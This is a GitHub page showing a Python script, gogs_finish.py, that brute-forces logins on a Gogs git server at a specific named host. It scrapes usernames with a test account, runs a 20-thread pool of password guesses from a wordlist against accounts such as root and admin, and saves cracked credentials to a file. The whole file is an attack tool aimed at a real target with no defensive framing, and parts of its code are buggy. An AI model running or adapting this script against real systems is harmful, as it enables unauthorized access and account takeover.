-
Notifications
You must be signed in to change notification settings - Fork 0
/
gogs_finish.py
123 lines (112 loc) · 3.52 KB
/
gogs_finish.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# -*- coding: utf-8 -*-
from threadpool import makeRequests, ThreadPool
from multiprocessing import Process
import sys
import requests
import traceback
from retrying import retry
from lxml import etree
import time
# 关闭报错信息
requests.packages.urllib3.disable_warnings()
url = "https://git.ub-66.com"
# url = "http://116.62.12.62:3000"
def login():
data = {
"user_name": "test",
"password": "123456"
}
res1 = requests.post(url + "/user/login", data=data, timeout=6, allow_redirects=False)
print(res1.status_code)
# print(res1.cookies)
if (res1.status_code == 302):
print("登陆成功")
cookie = res1.cookies
res2 = requests.get(url + "/explore/users", cookies=cookie)
tree = etree.HTML(res2.text)
userlist=tree.xpath('//span[@class="header"]//text()')
arr = []
for i in userlist:
if(i != "test" and len(i) > 1):
arr.append(i)
return arr
# 异常定义和特殊值(0)定义
class Finish(SyntaxWarning):
pass
class PauseInfo(SyntaxWarning):
pass
# func函数定义
# 0时返回False,其他偶数返回True
def func(para):
uname = para[0]
passwd = para[1]
data = {
"user_name": uname,
"password": passwd
}
try:
res1 = requests.post(url + "/user/login", data=data, timeout=8, allow_redirects=False)
except:
return False
print("passwd--",passwd," ",res1.status_code)
if(res1.status_code == 302):
print("登陆成功:","账号--", uname," 密码--",passwd)
f = open("success.txt", 'a+', encoding="utf-8")
f.write("账号--", uname," 密码--",passwd)
# f.close
do = open("success.txt", "a+", encoding="utf-8")
do.write("账号:"+ uname +"---密码:" + passwd +"\n")
do.close
return True
else:
return True
# while True:
# print(para, "我是第三个判断")
# print('continue for', para)
# time.sleep(para)
# callback定义
def callback(request, result):
if result:
raise Finish
else:
raise PauseInfo
# 线程池处理
# Finish标识任务完成,使用sys.exit退出线程池处理;
def main_thread(paras):
pool = ThreadPool(20)
requests = makeRequests(callable_=func, args_list=paras, callback=callback)
[pool.putRequest(req) for req in requests]
while True:
try:
pool.wait()
except Finish as e:
sys.exit(0)
except PauseInfo as e:
print("密码错误")
sys.exit(0)
except Exception as e:
print('预期之外的错误,停止当前任务')
sys.exit(1)
# 主函数起一个测试进程
if __name__ == '__main__':
# uarr = login()
uarr = ["root", "admin", "test"]
parr = []
f = open('passwd.txt', 'r')
for line in f.readlines():
parr.append(line.strip('\n'))
f.close
for i in uarr:
print("正在爆破账号--",i)
paras = []
for j in parr:
paras.append([i, j])
# paras = [["aaa", 111], ["bbb", 222], ["ccc", 333]]
try:
thread_test = Process(target=main_thread, args=(paras,))
thread_test.start()
thread_test.join(timeout=0.5)
except TimeoutError as e:
print('task timeout')
except Exception as e:
print('unknow error:',e)